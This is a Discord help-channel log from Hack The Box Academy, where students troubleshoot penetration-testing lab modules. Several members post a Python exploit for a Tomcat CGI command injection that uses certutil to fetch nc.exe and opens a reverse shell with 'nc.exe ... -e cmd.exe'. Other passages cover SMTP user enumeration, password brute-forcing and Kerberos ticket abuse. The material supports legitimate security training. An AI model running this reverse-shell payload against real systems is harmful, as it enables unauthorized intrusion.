#modules

1 messages · Page 229 of 1

strange spindle
#

the commands im running on the kali machine are sed -i 's/\s\s\+/\n/g' cert.pem followed by openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

feral nimbus
#

Hey guys I was reading through the Networking module of HTB had some confusion. It's explain how traceroute works:

The process repeats until the TCP SYN packet reaches the destination host and receives a TCP SYN/ACK or a TCP RST response from the target
However what would happen, if the destination simply drops the packet and doesn't respond would the process keep on going? Or how will the process stop?

fathom pendant
feral nimbus
cedar yew
#

hello guys, my modüle password attack pass the ticket from linux
why im not connect the david

#

i want to connect david ssh 172.16.1.15

cosmic obsidian
#

Attacking Email Services
What is the available username for the domain inlanefreight.htb in the SMTP server?
I am stuck in this module. i have tried
smtp-user-enum -M RCPT -U users.txt -D inlanefreight.htb -t 10.129.69.89
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )


Scan Information

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 79
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb

######## Scan started at Tue Apr 2 15:41:01 2024 #########
######## Scan completed at Tue Apr 2 15:42:20 2024 #########
0 results.

79 queries in 79 seconds (1.0 queries / sec)
I have also tried the remaining modes in smtp-user-enum (VRFY,EXPN,RCPT)
i am using the usernames list which is provided in the resources. i don't know what is the mistake here.
any help?

soft cedar
cedar yew
#

im try

#

but not working

#

this module connect linux from windows

soft cedar
soft cedar
cosmic obsidian
soft cedar
cedar yew
#

im try 22 and 2222

soft cedar
cedar yew
#

oky

soft cedar
cosmic obsidian
soft cedar
cedar yew
#

yes but this macinhe 1.5

#

we need to go 1.15

soft cedar
cedar yew
#

I tried to connect but it wouldn't connect, so I don't exactly know how to do that since I haven't moved to that module yet.

cedar yew
#

hm

#

my terminal just waiting

soft cedar
cedar yew
#

oky

atomic sigil
#

Hi guys for Advanced XSS and CSRF Exploitation - CORS Misconfiguration section. Can I get some nudge? I developed the exploit. But the withCredentials property in xhr object just doesn't seem to work. It keeps exfiltrate the unlogged in page even though I've already logged in as htb-stdnt in my browser.

worthy hollow
# soft cedar

same problem on the chapter pass the ticket from windows i have creds

#

how to report a problem

soft cedar
#

I think the green HTB logo on the bottom right.

worthy hollow
sinful olive
#

I used my own kali for connection - it works until I try to connect to ssh. (It works fine in parrot os)

2024-04-02 07:31:02 read UDPv4 [ENETUNREACH]: Network is unreachable (fd=3,code=101)
2024-04-02 07:31:03 read UDPv4 [ENETUNREACH]: Network is unreachable (fd=3,code=101)
2024-04-02 07:31:10 read UDPv4 [ENETUNREACH]: Network is unreachable (fd=3,code=101)
sinful olive
#

Can anyone help me please? I am trying to prepare my parrot OS vm ready for the exam.. I cannot install mysql and crackmapexec to work on it. I created another kali machine and they work on it, but it has problem connecting to ssh for some weird reason

rustic sage
#

I'm looking at malware for red-teaming ethical purposes, and I'm looking at the Static-Analysis section of this course and it's talking about encrypting shellcode to evade static analysis, I'm assuming this "shell-code" is just the hex code of this program? No tutorial teaches you how to get this shell-code do you just open a hex editor and get it via that or am I getting confused on what shell code actually is?

astral meteor
#

hei

craggy sedge
#

Hi am new here
Can any one teach me how to hack as a beginner

next bronze
rustic sage
#

Password attacks lab medium. Did enum and found three users. Can I get a hint. How long more or less did you wait for mutated pw to run through these three. I just want to make sure I’m not wasting time

fickle bison
#

anybody having problems on this challenge in CDSA? inetsim appears to be working fine on VM however the patched shell isnt working

naive shell
rustic sage
#

Ok cool. It’s just slow and I hate wasting time, thanks. Hint for all those alwyays enum and use what you have user wise

#

Anon logins are always juicy

naive shell
lethal widget
#

Anyone?

rustic sage
rustic sage
soft cedar
rustic sage
#

Ugh

soft cedar
#

or install libreoffice on linux.

rustic sage
#

Yeah I’m doing libre now

soft cedar
next bronze
# rustic sage I don’t want generated shellcode, the point is I have code in a file that is det...

shellcode is literally just binary data which can be loaded to do something, you can't just turn a program into shellcode, if you want to write them, it's usually writtern in assembly or from minimal C. if you already have a program that does something, then you can't just run it as shellcode, you'll need to find other ways. there's many resources on this, why don't you use google?
https://www.ired.team/offensive-security/code-injection-process-injection/writing-and-compiling-shellcode-in-c

#

also this is off topic for this channel

runic depot
#

Very late reply but in the dump file what specifically are you searching for in order to get to that block of code? I do see the disable defender. ps1 in the dmp however but no other ps1s

strange panther
#

always read the whole text kekw I've been trying to complete a module for about 30 minutes now

#

I wasn't reading the entire terminal output from the command and obtaining it several times without noticing

#

OMEGALUL big giga brain

tranquil axle
wispy wing
#

Hi, I have a question. On Silver annual subscription it says I'd have access to
"- Direct access to all modules up to (including) Tier II",
but on monthly Silver it doesn't show it. Is this a perk only for the people who subscribe for a year?

remote latch
#

if you can get academic email...

wispy wing
#

Yeah, I'm 4th year student and have academic e-mail, I'm not sure if it works with my uni (it's in Bulgaria, Eastern Europe)

remote latch
#

the problem is that you might lose ur account when the email expires

wispy wing
#

Thanks, I'm gonna think about it. It expires in a few months so I'd lose all my progress

dim wolf
wispy wing
#

I registered with my other e-mail (student email) and it allows me to subscribe for their student plan now.

I'm gonna sub with it for now, not sure when it expires but it's not for at least 3-4 more months. I'll swap later if they delete it.

Thank you very much

rocky perch
#

for the windows event logs finding evil module can i get help the 1st question didn't provide the right id or time for the answer and now im completely lost for the 2nd one if anyone can give me insight or hints to complete it id be grateful

#

nvm i got it

woven zenith
#

Did you ever figure this out? I have the shell but I cannot find anything either

fathom pendant
strange panther
#

I'm having a troubling time with DNS and host file for this exercise 💀
I've done the echo 'ip address url' >> /etc/hosts which should fix the missing page or so I think
but I can't seem to get it to work as I intend kekw

#

These things can be so finnickity sometimes

fathom pendant
strange panther
#

Yeah I'm using sudo to write to /etc/hosts I'm aware of that much

fathom pendant
#

Which is why most people will either sudo [text editor] /etc/hosts

#

Or echo ip domain | sudo tee -a /etc/hosts

fathom pendant
#

Are you saying you switched to root?

#

In which case, that's also just bad practice and habits

#

After you ran your command, did you try reading the /etc/hosts file to see if it even added it?

strange panther
#

Yes, I confirmed that it was included within the /etc/hosts file

fathom pendant
#

What does your hosts file look like then

strange panther
#

Funnily enough, using nano instead of adding it to the file instead of just the terminal resolved it appropriately

fathom pendant
#

¯_(ツ)_/¯

strange panther
#

Thanks for the suggestion, I haven't had that issue arise before

magic ibex
#

hi guys i'm fresh new

#

i really appreciate every help thank you ❤️

crystal steeple
#

im in linux PE module, i tried the exact same steps shown in the section Miscellaneous Techniques

#

but when i try to execute the shell i get this error

next bronze
#

the host you compiled the binary in has a newer glibc than the target, either compile in an older version (probably pwnbox) or statically link it

crystal steeple
#

since i may run into this in an exam where pwnbox wouldn't be beneficial to switch to or so

next bronze
#

I just have a couple of older ubuntu vms for stuff like this

dim wolf
#

when is the secure coding certificate

#

i see they're making a secure coding path

crystal steeple
#

same problem in pwnbox :/

next bronze
#

run ldd --version , the compiling host's version needs to be lower or equal than the target's

crystal steeple
#

i will do it later i turned off my pc, thank you

thorny edge
#

hello guys. I have stuck on ZAP. I can't set the scope to the site that I want to target

#

does anyone know how to do it?

cloud urchin
#

you just right click on it and pick add to context

mint echo
#

Hii guys, I've been going through the IDS/IPS evasion section of the nmap module, and am having difficulty understanding the concepts.

Can someone please tell me in this "Scan by using different Source IP" example, the - S <ip> is our VM's ip that we are scanning the target with or is it some other ip?

thorny edge
cloud urchin
thorny edge
#

is it bc I use pwnbox?

cloud urchin
#

i doubt it

thorny edge
#

I cant send image here

thorny edge
cloud urchin
#

make sure you're right clicking in the sites or history tab

#

just use the help page it can explain it better than me, i can't troubleshoot it for you

thorny edge
#

for some reason I can use the spider mode but not in UI

junior oxide
#

hi all i'm stuck on file upload attacks module in blacklisted filters whenever i upload a .php file with a test message i send the request to the intruder and do what the module says and start the attack to get non blacklisted extensions however it gives me that every file the i upload regardless of its extensions is allowed (file successfully uploaded) and when i try to reach for that payload i get 404 not found any nugget here ?

tough tiger
rustic sage
#

Guys, is the windows priv esc skill assessment 1 VM broken? ||Yesterday after trying like 15 different CLSID I managed to get SYSTEM user. Now today the CLSID that worked no longer does and so far I've tried again a lot to no avail.||

thorny edge
crimson eagle
#

Anyone know what's going on here?

tranquil axle
#

it thinks you are trying to call "GhostPack" with the argument "Compiled"

crimson eagle
brazen bobcat
#

For the NTLM Cross-protocol Relay Attacks, question : Use impacket's SOCKS server to hold NPORT's relayed connections and abuse them to access the MSSQL service at 172.16.117.60; query the 'flag' table within the 'development01' database and submit the flag. I'm getting this error : [-] Connection against target mssql://172.16.117.60 FAILED: [('SSL routines', '', 'no protocols available')]

I'd appreciate some help please.

#

Is it broken or did someone actually do it ?

uneven oracle
#

Why won’t it let me upload a picture?

cloud urchin
tame basin
#

These new gpt jailbreaks are so scary

winged bone
#

Hey guys! New guy here. Do you guys know if it is allowed to do modules with a vm or another computer instead of using the pwnbox? Because I honestly find it easier to do with a vm but it just hit me that i dont even know if thats legal lol. Thanks in advance ❤️

fringe urchin
fringe urchin
#

under each module that has questions there is a vpn. you only need to download it once

then you just sudo openvpn nameofthefile.ovpn

winged bone
fringe urchin
winged bone
#

Nah im doing Cracking into Hack the Box

fringe urchin
#

not all sections have questions at the end, not sure about the specific module that you are doing but in cpts path you have these cube marks where it means there are questions you need to complete.

maybe you just reading the introduction section thats why you havent see em?

winged bone
dim wolf
#

i believe cracking into hack the box has the Web Requests, JavaScript Deobfuscation, and Getting Started modules

uneven oracle
winged bone
warm flame
#

Can I get some help with cors misconfiguration?

dim wolf
#

guys i'm stuck on Introduction to Academy

winged bone
dreamy solar
#

Hello man can you help me please 2 mins ? I have a problem with my paylaod ... #!/usr/bin/env python3 import time import requests host='10.129.201.89'#add host to connect port='8080'#add port of host {default:8080} server_ip='10.129.201.89'#server that has nc.exe file to get reverse shell server_port='80' nc_ip='10.10.15.78' nc_port='1234' url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + server_port + "%2Fnc%2Eexe+nc.exe" url2 = host + ":" + str(port) + "/cgi/cmd.bat?nc.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe" try: requests.get("http://" + url1) time.sleep(2) requests.get("http://" + url2) print(url2) except: print("Some error occured in the script")

#

server it is ip target ?

#

nc_ip it is my machine and host it is ip target server

analog dock
#

And you need to tell the module, section and question

dreamy solar
analog dock
#

No

dreamy solar
#
import time
import requests
host='10.129.201.89'#add host to connect
port='8080'#add port of host {default:8080}
server_ip='10.129.201.89'#server that has nc.exe file to get reverse shell
server_port='80'
nc_ip='10.10.15.78'
nc_port='1234'
url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + server_port + "%2Fnc%2Eexe+nc.exe"
url2 = host + ":" + str(port) + "/cgi/cmd.bat?nc.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe"
try:
    requests.get("http://" + url1)
    time.sleep(2)
    requests.get("http://" + url2)
    print(url2)
except:
    print("Some error occured in the script")```
analog dock
#

Triple backticks

#

Not single

dim wolf
#

alt + print screen to screencap current window, win + shift + s to use snipping tool

analog dock
#

That’s better

dreamy solar
#

ah okay thanks

#

sorry

analog dock
#

What module is this?

analog dock
#

And section

#

Type it out, I’m on mobile. Not logged in to academy

dreamy solar
#

ATTACKING COMMON APPLICATIONS
Attacking Common Applications - Skills Assessment I

dreamy solar
analog dock
#

Ok, what’s the issue?

dreamy solar
#

when I run my paylaod it doesn't work I followed the different docs that I saw but I don't understand where my error is

analog dock
#

How can host and server ip be the same?

dreamy solar
#

yes bad copy now : I have :

#
import time
import requests
host='10.129.201.89'#add host to connect
port='8080'#add port of host {default:8080}
server_ip='10.10.15.78'#server that has nc.exe file to get reverse shell
server_port='80'
nc_ip='10.10.15.78'
nc_port='1234'
url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + server_port + "%2Fnc%2Eexe+nc.exe"
url2 = host + ":" + str(port) + "/cgi/cmd.bat?nc.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe"
try:
    requests.get("http://" + url1)
    time.sleep(2)
    requests.get("http://" + url2)
    print(url2)
except:
    print("Some error occured in the script")```
#

My http.server :

#
[sudo] Mot de passe de indra : 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.201.89 - - [02/Apr/2024 22:16:11] "GET /nc.exe HTTP/1.1" 200 -
10.129.201.89 - - [02/Apr/2024 22:16:11] "GET /nc.exe HTTP/1.1" 200 -```
#

but my shell...

analog dock
#

Ok it does get the nc.exe

#

You have your listener set up?

uneven oracle
dreamy solar
#

yes ``` Directory of C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi

04/02/2024 12:56 PM <DIR> .
04/02/2024 12:56 PM <DIR> ..
09/01/2021 07:58 AM <DIR> %SystemDrive%
09/29/2021 09:26 AM 73,802 bHPVV.exe
08/31/2021 01:55 PM 48 cmd.bat
04/02/2024 01:16 PM 30 nc.exe
3 File(s) 73,880 bytes
3 Dir(s) 28,375,203,840 bytes free```

#

And in my nc.exe I have :

#

nc.exe 10.10.15.78 1234 -e sh

analog dock
#

That’s wrong

#

You set up a listener on your kali with nc -lvnp 1234

#

The script executes nc <ip> <port> -e cmd.exe, as it’s windows

#

You only have to set up a listener

dreamy solar
#

What listener I must to use ?

analog dock
#

I gave you the command

analog dock
#

So set up http server where you have the nc.exe binary, nc -lvnp 1234 in another window and then run the python script

dreamy solar
#

This is exactly what I did

late galleon
#

anybody know how to get an SSH password for login to port 22?

#

tried Hydra but nothing :/

analog dock
#

That’s not it

cloud urchin
late galleon
analog dock
late galleon
#

now just trying to do ssh @10.10.11.253

dreamy solar
late galleon
#

perfection box

late galleon
cloud urchin
#

unless the module is very specific about attacking ssh, don't attack ssh

dreamy solar
fathom pendant
analog dock
fathom pendant
analog dock
#

How did you see the nc.exe on the target machine?

fathom pendant
#

I'm telling you the appropriate place to ask for assistance with a box

dreamy solar
late galleon
#

asks for a password to login to it

fathom pendant
dreamy solar
fathom pendant
#

I haven't done that module

dreamy solar
#
import time
import requests
host='10.129.201.89'#add host to connect
port='8080'#add port of host {default:8080}
server_ip='10.10.15.78'#server that has nc.exe file to get reverse shell
server_port='80'
nc_ip='10.10.15.78'
nc_port='4444'
url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + server_port + "%2Fnc%2Eexe+nc.exe"
url2 = host + ":" + str(port) + "/cgi/cmd.bat?&ncat.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe"
try:
    requests.get("http://" + url1)
    time.sleep(2)
    requests.get("http://" + url2)
    print(url2)
except:
    print("Some error occured in the script")```
languid wharf
#

which module is that?

dreamy solar
#

for the Attacking Common Applications - Skills Assessment I - We don't understand why it doesn't work 🥲

languid wharf
#

simple commands do work for you?

#

like trying to run dir

dreamy solar
cloud urchin
#

it works

fathom pendant
dreamy solar
#

Yes I use nc before

#

and here I test ncat it isn't okay too

languid wharf
fathom pendant
languid wharf
#

look at your exploit code, url1 uploads the nc executable as nc.exe to the remote machine, and then you're trying to use a ncat.exe executable which doesn't exist on the system, because it was uploaded under a different name

dreamy solar
languid wharf
#

btw Marcie do you remember me? you've helped me a lot back then lol

dreamy solar
dreamy solar
fathom pendant
languid wharf
fathom pendant
#

Because it generally means I remember you being an idiot

analog dock
#

It works on my machine @dreamy solar

fathom pendant
dreamy solar
fathom pendant
#

Did you allow for spaces in your command?

analog dock
#

python3 -m http.server 80 in dir where i have nc.exe

nc -lvnp 1234 in other window

#!/usr/bin/env python3
import time
import requests
host='10.129.124.251' #add host to connect
port='8080' #add port of host {default:8080}
server_ip='10.10.15.2' #server that has nc.exe file to get reverse shell
server_port='80'
nc_ip='10.10.15.2'
nc_port='1234'
url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + >
url2 = host + ":" + str(port) + "/cgi/cmd.bat?&nc.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe"
try:
    requests.get("http://" + url1)
    time.sleep(2)
    requests.get("http://" + url2)
    print(url2)
except:
    print("Some error occured in the script")
analog dock
#

then run script

#

make sure you change my tun0 ip to yours

dreamy solar
#
import time
import requests
host='10.129.201.89' #add host to connect
port='8080' #add port of host {default:8080}
server_ip='10.10.15.78' #server that has nc.exe file to get reverse shell
server_port='80'
nc_ip='10.10.15.78'
nc_port='1234'
url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + server_port + "%2Fnc%2Eexe+nc.exe"
url2 = host + ":" + str(port) + "/cgi/cmd.bat?&nc.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe"
try:
    requests.get("http://" + url1)
    time.sleep(2)
    requests.get("http://" + url2)
    print(url2)
except:
    print("Some error occured in the script")
cloud urchin
#

don't you have command execution on the victim?

cloud urchin
dreamy solar
analog dock
cloud urchin
analog dock
#

And you have a nc listener on 1234?

dreamy solar
analog dock
#

Is this your host?

#

You really should just get a kali vm

cloud urchin
#

check the desktop

#

all this time with that shell you could have found it by now, easier to just curl

dreamy solar
#

yes it is my host limit I go to do exercice on th e machine Parot VM

cloud urchin
#

are you on the vpn?

dreamy solar
#

yes

soft cedar
#

Btw, you can use metasploit to achieve this.

analog dock
#

Try it from parrot

soft cedar
#

if you know the cve.

dreamy solar
dreamy solar
analog dock
#

The nc.exe needs to be the actual nc.exe binary. Not some self made file

cedar yew
#

hello guys, i have question i use the carlos keytab file and acces'De carlos directory but cant read file or download how to read carlos.txt or download

analog dock
#

Or change it to -c cat carlos.txt

#

If you chose the former you can get Carlos.txt after connecting to it

cedar yew
#

smbclient //dc01/carlos/carlos.txt -k -c cat

analog dock
#

Remove -c cat

#

And remove /Carlos.txt

dreamy solar
analog dock
#

You need to download the nc.exe binary from GitHub

dreamy solar
#

ohhh

analog dock
#

Or just get a kali vm like I said

dreamy solar
#

okkk

analog dock
#

Because they have windows binaries installed

cedar yew
#

yes im connect but i can not reading file im try get, cat, more

dreamy solar
analog dock
#

smbclient //dc01/carlos -k

#

get carlos.txt

cedar yew
#

hah oky

fathom pendant
# cedar yew smbclient //dc01/carlos/carlos.txt -k -c cat

You're getting a bad network name because smbclient only connects to directories, you need to get rid of the "Carlos.txt" then try reading it again, as it shows here its trying to access //dc01/carlos/carlos.txt/ as a directory

#

You'd need to first connect to the share then get the file

rustic sage
#

This might be a stupid question - and if it is so I apologize from the get go - but I remember silver monthly subscription was providing access to all modules up to Tier 2. Did this change or my account is having a hiccup?

fathom pendant
#

With -c get filename

cedar yew
#

At the end, since it was the cat command, I tried adding it like that, but it actually works as you said, I solved it, thank you.

fathom pendant
fathom pendant
rustic sage
#

Ah thank you for the clarification.

desert cypress
#

Hi, quick question about the Attacking Enterprise Networks module. I've found the initial access, but my revershell crashes (I'm using nc as a listener). I've also stabilised it. I'm asking this to find out if it's a network problem or if I need a special conf for the reverse shell.

fathom pendant
#

Maybe connection problems

desert cypress
#

That explains why my pwncat doesn't work either x)

#

I've also noticed that when I run my burp command from the repeater, the request is on standby, and as soon as my shell crashes, I get the response

dire abyss
dire abyss
cedar yew
#

do you use privilege::debug ?

dense turret
#

I have a question for a machine, I can´t make a "nmap -sCV [IP]" and it didn´t happened in the video of the resolution

dire abyss
fickle bison
cedar yew
#

I have a question. I took the kt file of the svc workstations user and connected with smbclient, but I don't know how to go further.

#

i have aes256 hash for svc user

#

module - Pass the Ticket (PtT) from Linux

cedar yew
soft cedar
cedar yew
#

hash aes256

soft cedar
#

Which keytab did you extract?

cedar yew
#

kt

soft cedar
#

Use the all.kt

cedar yew
#

python3 /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt

#

i use this file

soft cedar
cedar yew
#

-_-

#

i dont understand

soft cedar
#

Check the .scripts directory.

#

There should be more than one keytab there..

cedar yew
#

he

#

okey

dire abyss
novel hinge
#

been on this one for 2 days now. im just lost. i used all the tools in the lesson but i dont have access to sudo. do i need to escalate privledges? i want to run lazagne but cant as a normal user. this is Credential Hunting in Linux in Password Attacks

fathom pendant
novel hinge
#

ah okay ill keep looking. ill come back in an hour if i have no progress xd

novel hinge
#

got it! thank u

crystal steeple
#

in my linux vm 2.37

novel hinge
#

so i found the two shadow files i need to unshadow. tried wget on my machine (tried running nc on the targets machine) and scp. neither were able to get this file downloaded. can someone point me in the right direction?

crystal steeple
# crystal steeple in my linux vm 2.37

lmao i just compiled it in the ssh host, and then transfered it to my machine as root so it changed the owner to root, deleted the first compiled shell in the ssh and trasnfered it from my linux vm

#

so i can have now a complied shell with root owner and compiled in the wanted library

lofty phoenix
#

has anyone figured out the logrotate task in linux privesc module? i found the writable file and logrotten executes the payload but no shell

fathom pendant
buoyant void
crystal steeple
lofty phoenix
#

thank you both @buoyant void and @crystal steeple ! i was able to get in and grab the flag before it closed rn!

buoyant void
shut quest
fickle bison
fathom pendant
#

If it's a tier 0 module the cubes come from completing the module

#

Also delete the image as its a spoiler you goon

glacial raft
#

yes boss

glacial raft
fathom pendant
#

Specifically the MAIL environment variable

glacial raft
fathom pendant
glacial raft
#

i see

fathom pendant
#

Not important, it was definitely in poor taste. This also isn't the relevant channel to discuss random things

novel hinge
#

when running hashcat against this list, can i go ahead and remove all hashes for all the other users? i only need to find root. its taking a long time running it against rockyou.txt

fathom pendant
#

My pfp has nothing to do with it

fathom pendant
novel hinge
#

got it thank you!

fathom pendant
#

It's a turn of phrase ya goon

novel hinge
#

i want to make sure im reading this correctly, this example is showing how to do it on your attack machine right? it would make no sense (to me) to use my /passwd and /shadow to get the flag. its referring to using the .bak's i got from the target?

fathom pendant
#

Your unshadowed file looks correct

grand portal
#

Excuse me, I got a notification saying "these people are talking about sexual harrasment". How can I stop it?

novel hinge
#

cool, its just taking awhile to crack i guess ;/

fathom pendant
#

But its a thing you have to go into server settings for

grand portal
#

Okay.

fathom pendant
novel hinge
#

i think my computer is going to explode if he has to do another 1mil

next bronze
#

how are you only getting 2kH/s?

#

don't run hashcat in a vm, do it in your host

fathom pendant
#

Sounds like their cpu is mid

next bronze
#

yeah

soft cedar
#

plus the progress is in ~ 32%
are you doing the right thing?

fathom pendant
#

Granted I'm surprised my Frankenstein system works... I'm fairly certain at this point my laptop is possessed

next bronze
#

you're running it on bare metal? vm adds a ton of overhead

novel hinge
#

im not supposed to run this on virtualbox? ^ this is what im working with

next bronze
#

hashcat is vms is very slow, do it in your host

autumn pilot
#

use the mutated wordlist

novel hinge
#

@autumn pilot which mutated? mutated with the Loveyou1 password? or just use the password list they had in the resources

#

or custom.rule + password.list

heady fern
#

Which path to do after "InfoSec Foundations"?

autumn pilot
novel hinge
#

thank you ill give it a shot in the morning

dim wolf
rustic sage
#

do you need to know reverse engineering + advanced programming to find 0 days?

dim wolf
#

if you're interested in web, go for Bug Bounty Hunter instead

#

or if you feel like blue teaming, check out the extra modules from the SOC Analyst Prerequisites skill path (there's quite an overlap)

rustic sage
#

does hackthebox teach u the process behind finding zero days in pen test path?

wise vault
#

@soft cedar

soft cedar
dim wolf
#

you've got the entire database at your disposal

soft cedar
wise vault
#

it just opens prompts with some attributes

soft cedar
#

and then you might want to delete them after, since they contain spoilers.

wise vault
#

when clicked

autumn pilot
#

In an SQL database you can run SQL queries

#

take advantage of that

wise vault
wise vault
solar pecan
#

hey guys a quick help if you know. I am on Kerberoasting from windows and follow the example with mimikatz. The commands I used are base64 /out:true and kerberos::list /export
all work good but I dont see any files saved.. Do you know why?

wise vault
#

nothings there

autumn pilot
#

Just telling me to see it is not going to make me see it as to me it sounds like you want to be handheld at every step and showing that you are uncertain what you want to do

#

Instead of pasting screenshots from the exercises, try to craft some short explanation of what you have been trying to do

#

And don't forget all fo the exercises be it in sections or skills assessments are based on the knowledge you gain through the sections

soft cedar
autumn pilot
#

there is literally a section called MSSQL in the footprinting module

keen cypress
#

Hello ! I have a question regarding the Windows AD Enumeration module.

I wanted to know if it's normal to not have the MDNS protocol's entries via wireshark and via tcpdump.

I don't why, but for example tcpdump does'nt work very well, a huge part of the packets is dropped by the kernel.

Responder works well.

I'm connected via ssh to the parrot vm (for tcpdump).

autumn pilot
#

You can connect via RDP to the target VM and use wireshark

keen cypress
#

I did this too, I did not mentionned it, sry. wireshark or tcpdump do not work to capture MDNS packets. That is not a real problem, but I wanted to know if it is related to the vm or a configuration and wanted to capture the packets by myself instead of just looking at the pictures.

autumn pilot
#

I've just tried with wireshark and was able to see the MDNS requests, make sure you to start wireshark using sudo -E wireshark

keen cypress
#

Yeah ok, I'll do this again. That's the command I used. Maybe the vm was unstable.

#

Ok, I suppose that I am doing something wrong, but no mdns packets. Only NBNS, ARP and tcp packets.

heavy lily
#

can someone help me with Advanced SQL Injection Skills Assessment. i am able to extract column_names but the columname for the passwords have some weird behavior. i think the password should begin with a known character because of the hashtype, anyone have time to check some things with me.

olive slate
#

Is anyone able to give some pointers on 'AD Enumeration & Attacks - Skills Assessment Part II' Q8, I've been stuck here for a while, running out of ideas

pine vault
next bronze
full nimbus
#

Hi Folks, in the Linux Privilege Escalation module, in the restricted shell escape module, I managed to break out of the shell from outside, but wanted to check if someone found an alternative method from within the shell ?.

next bronze
#

there is but I can't remember what they are 4Head

#

I know there are 2 methods tho

full nimbus
olive slate
next bronze
#

there are other things you can dump than just the system hive

#

you've gotten the local admin's hash, which is not a domain account, so it wouldn't work on other hosts

soft cedar
#

you can also use ||echo||

full nimbus
#

Thanks, I triied a few things in || echo|| but not all of them. I mannaged to do it with || no profile trick ||as well

soft cedar
olive slate
next bronze
#

yep

strange spindle
#

anybody have any insight on this? been at it for 2 days now 😅

next bronze
#

did the module ask you to run the sed command? the openssl command is just
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

olive slate
# next bronze yep

Clear text password didn't work, but managed to pass the hash and got access. Thanks for the tip!!!

strange spindle
next bronze
#

yep

earnest mulch
#

the mut password list really really does not work

#

retried like 6 times over the past 5 hours to no avail

analog dock
earnest mulch
#

ftp smb etc

#

all tried but all failed

analog dock
#

What module and section are you doing

#

Overall I wouldn’t recommend bruteforcing ssh with a big list, as it’s much slower

earnest mulch
#

I have been staring at my terminal for the past 6 hours for this shit

analog dock
earnest mulch
#

even tried everything such as removing anything with less than 10 char

#

and only taking top 20k or top 5k as some of the prev convos here suggested

analog dock
#

Try bruteforcing ftp, with a bit less threads

earnest mulch
analog dock
#

The attack does still take some time though, but should work

earnest mulch
#

nope the thing nuked itself

#

ugh I need something to do while mist went bust

analog dock
#

Connection error

#

Please reset your target

earnest mulch
#

for the 6th time today alright

analog dock
#

If I remember correctly the password stared with a B

#

So you could filter for that

earnest mulch
#

regex timez I guess

analog dock
#

Should speed it up a bit

#

Read #welcome and #rules . This question has nothing to do with this server

soft mural
#

sorry sir

earnest mulch
analog dock
#

You can remove everything before that in the list

#

If you then use hydra with 48 threads on ftp, it should work

#

@earnest mulch got it?

heady fern
#

Would I be equipped with the necessary toolset for hacking boxes after completing penetration tester path?

long flint
#

anyone know if we can get the htb academy badges to show our real name instead of username?

cedar yew
#

Where am I making a mistake here?

#

im connect the julio smb share and im use julio ccache file

#

pass the ticket from linux

#

julio 2 file expire

next bronze
#

there's 2 of those, did you try both?

#

also you don't have to use a command with smbclient, you can just connect to it

cedar yew
#

yup

#

im try 2 file

#

krb5cc_647401106_HRJDux
krb5cc_647401106_dfFgjE

#

klist says expire

supple oracle
#

I'm having trouble with the module "AD Enumeration & Attacks - Skills Assessment Part I". One of the domain hosts in the attack path doesn't seem to be up? Does anyone know how to find a box ops person?

next bronze
cedar yew
#

oky

weak fractal
#

in INTRODUCTION TO MALWARE ANALYSIS - Skills Assessment , Examine the communication patterns of the malware and provide the domain it interacts with as your answer. Answer format: .._ . I've used 64dpg on apple.exe I've tried to find the domain in Symbols tab and reference tab but I couldn't, can someone help me ?

supple oracle
cedar yew
#

its work -_-

next bronze
#

most probably not, what host is down

supple oracle
#

Perhaps any of you who have been working on this module lately? I'm starting to wonder if it's just me?

next bronze
#

if you've reset the lab and it's still the same, it's likely you're doing something wrong

supple oracle
#

u see i can't lookup SQL01

#

I can't get to it even if I get an SPN account.🥲

#

ms01 is ok .That's why I suspect there's something wrong with the environment. Or what am I doing wrong?

next bronze
#

you don't have to reach the host to kerberoast, the spn is assoiated with an account, not a host

supple oracle
#

I've finished kerberoasting(the SPN MSSQLSvc/SQL01.inlanefreight.local:1433). So I need to get to that host(SQL01), don't I?

next bronze
#

but you can't find that host, correct? so move to somewhere else

clear perch
#

hey guys i've been struggling on this question. So far I have found the service on the port and scanned some other ports but I am having trouble finding exploits for the services

brittle umbra
clear perch
#

I've had a look but idk exactly what i'm looking for in terms of something that will help me get to the flag 😭

next bronze
clear perch
#

I have tried but it ends up saying that it is unable to connect idk if im doing something wrong

next bronze
#

reset then

clear perch
#

okay thanks i'll try again from scratch

cedar yew
#

i dont understand this question

Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).

#

What exactly does he want me to do?

next bronze
#

same thing as what you did previously, just with a different user to a different directory

cedar yew
#

im root in machine

mint otter
#

